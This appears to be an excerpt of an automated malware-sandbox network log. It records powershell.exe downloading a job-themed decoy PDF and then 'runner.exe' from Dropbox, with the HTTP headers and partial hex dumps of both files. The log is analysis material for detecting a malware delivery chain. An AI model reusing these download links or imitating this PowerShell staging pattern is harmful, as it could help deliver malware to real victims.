                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 18 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  24192.168.2.649818162.125.69.154438924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:34 UTC370OUTGET /cd/0/get/Cghw7odouuVP5zAFfdnS8mkYkdEcHxcxeRVfOOLHoaVzf8CCxx4FYRE2toSmBIUSkAZ2VdW2HdPvLFiAkDwPdmC_5HYDIqN6fsWKpMoxUyzniDcSiXrh2CW-ZKL7s-PQM-0M0tkKwAILRH3xN_ZhESsc/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="Documents about company information and job descriptions (4).pdf"; filename*=UTF-8''Documents%20about%20company%20information%20and%20job%20descriptions%20%284%29.pdf
                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  Etag: 1734593169669779d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 146
                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:34 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 656088
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: a464a149e3dc464fb70834c9cdc3e1bd
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC15521INData Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 39 33 0a 2f 4e 20 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 90 bd 4a c3 00 14 85 bf d4 82 28 8a 83 0e 1d 1c 32 38 b8 68 93 a6 69 52 70 69 22 16 d7 56 a1 a9 53 92 a6 41 ec 4f 48 53 f4 01 74 73 70 75 2b 2e be 80 e8 63 28 08 0e e2 e0 23 88 a0 b3 a4 41 52 90 78 e0 c2 c7 e1 c0 bd f7 40 ae 00 90 97 a0 3f 88 c2 46 dd 10 5b 56 5b 9c 7f 47 40 60 2a db 1d 05 64 4b 80 ef 97 24 fb bc f5 4f 2e 4b 0b 1d 6f e4 02 1f 40 14 b6 ac 36 08 1d 60 cd 4f f8 2c 66 27 e1 cb 98 4f a3 20 02 61 12 73 78 d0 30 41 b8 03 36 fd 19 76 66 d8 0d c2 38 ff 06 ec f4 7b 63 37 bd 9b 25 6f 70 d8 04 5a c0 3a 75 86 0c f1 e9 e1
                                                                                                                                                                                                                                                                  Data Ascii: %PDF-1.7%18 0 obj<</Length 293/N 3/Filter /FlateDecode>>streamx}J(28hiRpi"VSAOHStspu+.c(#ARx@?F[V[G@`*dK$O.Ko@6`O,f'O asx0A6vf8{c7%opZ:u
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC16384INData Raw: 68 92 2e f0 ab 37 a0 22 0a 71 20 88 96 63 31 98 33 b9 2f a6 fa 38 8f 04 3d d4 0b b5 ef 6d e2 5e 95 e3 5d 65 7e ab 25 a3 03 45 0d 7f e8 90 6c 97 39 68 a7 5d f3 dd e0 f8 62 77 23 93 24 36 55 9e 56 52 3e 16 62 ca 11 15 f9 76 5f f4 36 41 41 1b 75 c5 5f 4b f4 4f 92 36 e3 4c 27 4a e4 d7 89 da 24 e2 8b 14 92 13 3b 54 4c a2 3d 9b b4 9b 56 70 94 3b a4 a0 9a 08 ba fa 92 7e 9a 5e fe 84 c6 71 1d 91 0f e6 19 fd 59 f1 36 df 82 1f e2 46 4a be 29 2b 0e 60 bc 93 81 2e 0b 80 9e 3c 57 c4 1c af 36 f6 a5 b3 27 33 a6 1c 38 bd ba 80 5e 5d 30 28 57 28 4b d1 df b8 9a 34 f1 d8 a5 cf b5 e1 32 b6 59 07 e1 ee b0 f4 4c 72 cf 9a c8 4d 0a 5e d6 b7 53 f6 05 40 66 85 fe ff db ff 83 8d 57 dc 4c a4 03 28 e0 c5 af c4 97 55 ea 90 9f 16 67 64 f9 3e 87 a2 0b 33 7e 5b a2 eb 6b 6f 94 6a aa 22 fd
                                                                                                                                                                                                                                                                  Data Ascii: h.7"q c13/8=m^]e~%El9h]bw#$6UVR>bv_6AAu_KO6L'J$;TL=Vp;~^qY6FJ)+`.<W6'38^]0(W(K42YLrM^S@fWL(Ugd>3~[koj"
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC863INData Raw: 2e 47 34 a6 61 d4 78 6c 1e 7d d2 92 e2 ee d2 35 3d 6e fd 95 98 81 b8 7d 4d bc e0 b5 b3 a1 bf 6c ef ed f5 33 b7 7a 2e 9c 8d 67 31 c0 9e 78 ac 6a bc 47 ec e6 dc ce 0d 42 6a db dc 77 a9 3e f7 cd b1 22 e2 24 09 62 ea c0 b7 58 b3 dc d1 32 7b f8 57 8c dd 8b a7 45 0e e3 f1 a7 f1 b9 f6 70 dc f4 43 13 52 5d cd f6 d3 9f 16 94 91 b4 59 49 95 56 08 c4 da 92 9a 4a 76 2c 78 96 f0 e2 37 76 fb 66 b8 0e 9b 92 88 23 7e 7d e3 e0 64 56 b8 0e 8b 92 78 a8 14 ca 0d 3e 88 9c 82 f4 e9 5b ff f3 b4 2e 98 14 c1 44 ab af 8d 37 25 ac 5e e6 83 5a e7 e9 d1 29 61 d4 b0 b5 77 a3 15 67 9e 88 91 bd b2 7b dc 7e 1c 52 3f e1 4e 06 9b 38 9d 13 3e f3 ce e3 ea 5d 53 7a 1a 2f 49 49 51 23 52 2f f2 46 12 41 c5 3c 8c 47 04 fe a2 fa fa 29 a8 40 cf 88 4b 46 42 de f5 8e 62 da 57 df 75 4d 29 78 fa 74 7f
                                                                                                                                                                                                                                                                  Data Ascii: .G4axl}5=n}Ml3z.g1xjGBjw>"$bX2{WEpCR]YIVJv,x7vf#~}dVx>[.D7%^Z)awg{~R?N8>]Sz/IIQ#R/FA<G)@KFBbWuM)xt
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC16384INData Raw: fb 01 50 e9 9a 72 e3 97 0c 93 97 19 6e 70 d1 4d 63 57 77 39 c7 56 f3 86 4c f8 1b dd 09 3f 90 a0 27 e7 af c6 07 7b 08 86 69 f2 4d 25 e9 3f b8 4b e1 bc 8d 36 c5 df 47 d4 7e b1 2e 21 66 d0 b1 85 5c e4 1f 3f ee d2 7c 71 9c d6 d8 f1 15 eb f9 e6 66 45 3d 92 ee 0e 17 ac bf 34 1f 71 a1 f5 ce cc 2c 2f c3 4b e5 ca f0 53 27 1f 06 aa 92 e6 f2 3a 6d 46 74 fd f6 0a 9a 21 83 48 f2 da 0e 52 7d 43 ce d7 02 c7 5d cd 65 ed df 58 21 24 77 67 4b 8e cd da 87 64 fa c4 5f 4e 56 38 cb 25 f0 29 be 89 f5 75 df f7 c9 55 f6 4b 8d 23 6f 24 b3 6a e5 7f ca e6 26 d6 f1 9e 1b 36 51 92 55 0b 37 94 5c 7a 40 f9 42 fe 95 7b 7a 10 bb df 9d be 27 ce 17 16 18 b5 50 cd 33 4c 11 b8 ac 5a ad 31 f7 f8 6c e5 55 bb 7e 0d ba aa f3 a6 1b ed ea 04 0b 12 cc 8f 5b 67 33 be 1d a3 8c 80 0c c1 76 f4 9f 92 eb
                                                                                                                                                                                                                                                                  Data Ascii: PrnpMcWw9VL?'{iM%?K6G~.!f\?|qfE=4q,/KS':mFt!HR}C]eX!$wgKd_NV8%)uUK#o$j&6QU7\z@B{z'P3LZ1lU~[g3v
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC16086INData Raw: 79 f7 75 5c 75 9b d4 5c 90 37 42 10 38 8a 5b 7e 8f 56 ee 54 47 fa f6 e4 e5 37 9d 8e bd b6 9b 77 26 28 26 e8 c3 6a 68 c6 d7 6e 53 e8 89 71 57 c6 39 35 fe cf b0 c8 50 4a e6 74 e9 2e 98 ee 35 ae 80 ef 37 4a 2c a2 05 79 8a fc 99 04 c6 23 c2 ef a6 3a 75 f0 3a c1 4c 05 29 e4 ed 5f af 8d 3d 3d 9f 7a bf 96 dd d4 47 87 a8 4e 30 49 75 d0 20 1c b7 27 a2 37 ae cf f1 e0 24 aa 34 5f 47 8e 67 0d e8 de 0c 93 81 77 13 ee f5 52 51 08 22 b3 fe 65 6f b3 03 ce 85 a4 0f fe 83 79 9a 06 46 b8 2e 8a 84 f8 70 af e4 38 8d 64 19 60 c2 4c 38 d5 16 d8 20 ce 53 d1 45 2d a1 e0 1c af 9c 97 0b 2c 64 31 ce 82 da 5c de 1b 4d af e4 6f 25 e9 e6 52 96 15 da 49 51 68 41 36 3a c5 ac cf 33 0e 12 9d 6d 15 94 64 a6 d0 3f 11 15 88 9b 19 c4 20 98 92 d8 95 6f 04 d6 d2 cb f1 9a e8 5f 5f dc e7 dc ea cd
                                                                                                                                                                                                                                                                  Data Ascii: yu\u\7B8[~VTG7w&(&jhnSqW95PJt.57J,y#:u:L)_==zGN0Iu '7$4_GgwRQ"eoyF.p8d`L8 SE-,d1\Mo%RIQhA6:3md? o__
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC298INData Raw: a1 78 82 14 fe 55 a7 00 28 48 ad fa 6a 11 3e 6c 02 65 bc 80 56 47 b2 98 5b a6 de 16 e0 42 e4 0c 1a 42 d3 f1 fb 5b e3 10 1e fd f7 a0 b5 40 e1 c3 cc 3e d2 e3 10 2d 8d e1 c3 78 5e b2 26 8c 04 3d a1 96 4f 67 d3 b5 88 eb a0 65 35 82 b9 3f 8d a7 7f be 05 38 26 19 de 44 2b b2 e4 90 fa 2c 4f 98 67 24 42 63 22 50 da a3 3f 68 07 bb 76 05 a0 cc 75 cd d6 92 27 c6 fe 8b e0 96 f9 f4 4b 88 d6 44 72 97 37 34 86 00 d1 f0 5b b9 e3 0b 05 90 9d ba 15 69 cd 7d 81 3e f2 ff ae 18 57 98 1b f4 d1 8f 20 98 af 12 5e e4 dd 06 2d 3c fb cb d0 97 4b 02 66 45 38 b7 73 02 8d 35 8c ff 10 f2 8f ce dd 32 c6 0a 3f ec 00 85 08 8c 6a 33 61 d2 ff 2a 0a 0d ac 80 ae 75 70 02 ca 3e 0e b6 df f8 6f de c0 9b a7 e6 e5 ae 9e 7c 2d 44 eb 2f 95 a1 c4 66 19 88 d6 98 70 5a 7d 20 e0 01 f6 da ca b4 2b 96 94
                                                                                                                                                                                                                                                                  Data Ascii: xU(Hj>leVG[BB[@>-x^&=Oge5?8&D+,Og$Bc"P?hvu'KDr74[i}>W ^-<KfE8s52?j3a*up>o|-D/fpZ} +
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC16384INData Raw: 07 05 d3 04 be dc fc a7 85 80 05 49 df 00 3f d0 54 8e 84 53 0b 98 dd ff d3 0f 6c 97 d3 97 9b eb 57 41 89 93 40 43 d2 fc 5b 8e 3f 49 12 34 5a b6 06 e6 1b cc e1 f0 7a 9d 41 8f df 3a fd ce 3c 62 fe ec a0 91 a6 d5 6e 09 46 a2 b9 60 fe ef 05 f2 21 91 86 8f a9 7d 30 cd 06 fc 25 dd da 20 a9 80 af fd 4f 01 62 1a 12 74 0f 45 1e a5 3a 60 86 8e b0 77 51 47 5e 25 d2 a7 33 52 c7 2c 43 ca 72 80 e3 0f 75 cf 44 6e 15 f8 50 9f cf 5a 4d 4c 13 7c 8e f3 d2 59 1e 4a d1 92 49 0c fe ca 84 8c e3 17 43 02 16 04 62 be 18 9d 0d 5a 3d ac 85 69 5d 46 56 53 d2 71 ad 9e a6 b3 a5 95 10 63 df b4 ea 3d 24 8a aa 82 85 24 0b 60 04 83 62 43 d5 ad 45 78 46 92 e7 92 b7 49 cc be c7 36 fe 47 b1 9e 31 4a 01 3a 41 82 46 0d d5 d3 19 98 56 32 16 ee 9f 84 3d 1a 22 d0 a5 37 3e 24 ec 4e c9 e9 95 a0 7f
                                                                                                                                                                                                                                                                  Data Ascii: I?TSlWA@C[?I4ZzA:<bnF`!}0% ObtE:`wQG^%3R,CruDnPZML|YJICbZ=i]FVSqc=$$`bCExFI6G1J:AFV2="7>$N
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC16384INData Raw: 4f 25 e3 d3 eb a4 0d 9f 7a b7 15 c2 07 07 ad 4e 81 14 64 b2 38 ce cf 24 a1 b1 d2 7a ec ce 19 2b 85 73 67 f7 8c 0f 96 3c 36 ac 99 1e de 09 d5 b7 84 28 a5 73 ea f3 94 5d b5 be 3d bd c1 cb c4 f0 17 c6 20 30 79 05 f7 8e 13 52 09 5a 1f a7 a5 12 98 90 5f df 09 82 e0 d1 fe 29 8d 82 f7 3d 52 46 4c bd 75 fa fb b1 f0 da c0 ba 52 50 45 26 e4 d9 0f 15 1e 3d 77 67 cd 2e 31 4b 05 03 26 33 66 10 0c e1 d6 3a 58 c1 e9 be 00 f6 d4 c9 c4 d5 75 9c 1b 8c 1d 37 b6 cc e4 7a 05 19 b0 6a b3 a0 08 ca 80 20 b7 a9 ca 3a 4d 2a 78 57 61 e9 9f 25 45 88 61 26 2a db 3f 7b b3 b3 74 60 92 77 d6 3f 07 b4 b4 a2 52 23 db c3 fd ae bd 3e 53 59 ff 9b 99 22 d6 0c 0a e8 c2 d5 ba a5 0c 16 3a db 8f ce e8 4d a7 58 7a 06 65 a3 56 63 ec e8 5a 39 f2 3e 3a 7f f3 b8 60 25 b3 76 d2 28 3a 12 08 f8 95 22 b7
                                                                                                                                                                                                                                                                  Data Ascii: O%zNd8$z+sg<6(s]= 0yRZ_)=RFLuRPE&=wg.1K&3f:Xu7zj :M*xWa%Ea&*?{t`w?R#>SY":MXzeVcZ9>:`%v(:"
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC16384INData Raw: 8f d8 13 a1 12 95 e0 57 32 b8 17 bc 75 cf 82 5b 28 42 fa 52 c5 ac 5b 23 4d d8 cb 31 ce ca 49 a8 f1 ea b5 5b 9e c6 26 72 df 67 e7 5d d6 df 8e de d1 9f b0 a8 4f 2c 9b 1f a2 37 bf e2 64 a3 73 61 47 7d a2 1e 1a 48 dc 22 34 9b cf 45 5e 24 d9 84 e3 ef b5 eb c3 e6 02 af 9a 7b 07 cf 31 5d 6c 4d 20 dc fb c6 87 d6 6b 5a 68 f6 2f cf fb fa 2b fa be a4 23 6f b4 b6 cd a7 7d fb 15 58 bf cb f5 e5 dc 33 3d f1 e4 db 6f e8 d7 5f ee bb 2a 8a c1 ab d1 3a cf 59 ce ff ac 2e ae f7 b4 ce 73 5b f5 3a 30 f2 9c d3 cf 35 fe 1c 57 13 34 4c 15 c3 68 2b 6e e1 6f e1 56 17 0f 86 c4 68 c5 a1 51 9e fb 4d e5 35 ad f8 15 2f 0e 96 92 65 92 eb 8d b2 ec 47 9b 8e 35 84 25 4d 4c 53 52 99 2c 08 d8 e0 31 72 f6 6c a1 75 5e a1 ff ab 87 69 a1 ce 5f eb 35 f7 a4 fc 50 d7 0d fe 86 77 aa 7a 36 f5 51 77 79
                                                                                                                                                                                                                                                                  Data Ascii: W2u[(BR[#M1I[&rg]O,7dsaG}H"4E^${1]lM kZh/+#o}X3=o_*:Y.s[:05W4Lh+noVhQM5/eG5%MLSR,1rlu^i_5Pwz6Qwy
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC16384INData Raw: ea 78 00 e3 ab 11 42 b5 cc 67 c8 03 e0 d9 c1 8d 6e 9a c0 18 a7 1e 40 2c 98 58 94 15 21 98 5c 84 61 16 4c 5a 01 4e 60 7c db 38 27 09 a4 41 d4 97 07 40 c7 32 ec 30 80 87 93 31 c8 77 81 f5 ae b3 89 ac 46 52 1d 04 0f 50 86 1e 0c 4e ff b6 55 61 45 e4 ca c1 89 80 67 54 8d a0 6b 7b 81 21 6c cf c8 42 82 5e bd 53 93 85 dc 0b 62 da 91 1d 52 8c 7c 7c 40 1e c4 4d 51 8b bd 59 11 22 33 aa a4 15 32 19 f3 4a bd 70 76 23 f5 5a a7 84 74 69 aa 50 44 07 b4 76 e7 a6 09 aa 12 af 67 ed 9a b6 64 34 f9 9d 39 94 04 33 ea 4a 60 2e b1 91 e5 8c 8a fb 20 7e 78 51 8a 03 8a 29 18 8b 5a e1 24 95 7a e3 de 94 97 96 82 df ee 5a 37 3a 6e 8d ae 1b f5 5f 77 ee cd 66 dc e2 56 7a 5c 37 db 30 e0 56 b6 b9 56 80 36 b4 31 60 ea 86 a8 a0 50 af e2 85 19 41 ce 32 da a7 53 95 7c 52 c9 97 03 2a eb 68 a0
                                                                                                                                                                                                                                                                  Data Ascii: xBgn@,X!\aLZN`|8'A@201wFRPNUaEgTk{!lB^SbR||@MQY"32Jpv#ZtiPDvgd493J`. ~xQ)Z$zZ7:n_wfVz\70VV61`PA2S|R*h


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  25192.168.2.649840162.125.69.184438924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:38 UTC212OUTGET /scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/ [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com/cd/0/get/CggZQ6MA92jkJFVNQulAFQPZ1Z-PfRY6f4DVWW790BfPuOz9fs8kpop7SofVjwFUe8fid_RRRfFr3KULPd4IEzZqjCaOvm1Viyg7qZbtcEjlrfXMraQ_YzZLfVhNiL4qqyCzmYlqXU6tJd3GKRsjDe8M/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=NTYyNDM3OTY5MTY4MTc2MTY3NTQ0ODE0NjExMzI3Mzk3NzE0MDk=; Path=/; Expires=Tue, 18 Dec 2029 12:44:39 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=SWUEoVOLx5NxSx9rxGGNNP7M; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:39 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=SWUEoVOLx5NxSx9rxGGNNP7M; Path=/; Expires=Fri, 19 Dec 2025 12:44:39 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=AXgf1Q_unM; Path=/; Expires=Fri, 19 Dec 2025 12:44:39 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:39 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:39 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 804a0a6b1d664ac0b47993a98ee08226
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  26192.168.2.649855162.125.69.154438924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:41 UTC370OUTGET /cd/0/get/CggZQ6MA92jkJFVNQulAFQPZ1Z-PfRY6f4DVWW790BfPuOz9fs8kpop7SofVjwFUe8fid_RRRfFr3KULPd4IEzZqjCaOvm1Viyg7qZbtcEjlrfXMraQ_YzZLfVhNiL4qqyCzmYlqXU6tJd3GKRsjDe8M/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:42 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe
                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  Etag: 1734611873193801d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 565
                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:42 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 2949120
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 94bcdec0c361472cbd413c72a1ca078a
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:42 UTC15646INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 15 0f d0 df 51 6e be 8c 51 6e be 8c 51 6e be 8c 1a 16 bd 8d 40 6e be 8c 1a 16 bb 8d 91 6e be 8c d1 15 ba 8d 43 6e be 8c d1 15 bd 8d 47 6e be 8c d1 15 bb 8d 0a 6e be 8c df 15 bb 8d 57 6e be 8c 1a 16 ba 8d 4b 6e be 8c 1a 16 b8 8d 50 6e be 8c 1a 16 bf 8d 4c 6e be 8c 51 6e bf 8c 71 6f be 8c df 15 b7 8d 0a 6e be 8c df 15 41 8c 50 6e be 8c 51 6e 29 8c 50 6e be 8c df 15 bc 8d 50 6e be
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$QnQnQn@nnCnGnnWnKnPnLnQnqonAPnQn)PnPn
                                                                                                                                                                                                                                                                  2024-12-19 12:44:43 UTC16384INData Raw: 8b e5 5d c3 e8 0a 4d 07 00 cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 10 76 49 00 64 a1 00 00 00 00 50 51 56 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 64 a1 2c 00 00 00 8b 08 a1 a0 9e 4c 00 3b 81 04 00 00 00 0f 8e 4d 01 00 00 68 a0 9e 4c 00 e8 63 54 06 00 83 c4 04 83 3d a0 9e 4c 00 ff 0f 85 33 01 00 00 6a 40 6a 00 68 60 9e 4c 00 c7 45 fc 00 00 00 00 e8 04 72 06 00 83 c4 0c c7 05 64 9e 4c 00 00 00 00 00 c7 05 68 9e 4c 00 00 00 00 00 6a 2c e8 0e 50 06 00 83 c4 04 89 00 89 40 04 89 40 08 66 c7 40 0c 01 01 a3 64 9e 4c 00 c6 45 fc 01 b9 70 9e 4c 00 6a 20 68 c8 fa 4a 00 c7 05 70 9e 4c 00 00 00 00 00 c7 05 80 9e 4c 00 00 00 00 00 c7 05 84 9e 4c 00 00 00 00 00 e8 4d d6 ff ff 33 c0 c7 05 88 9e 4c 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: ]MUjhvIdPQV@L3PEdd,L;MhLcT=L3j@jh`LErdLhLj,P@@f@dLEpLj hJpLLLM3L
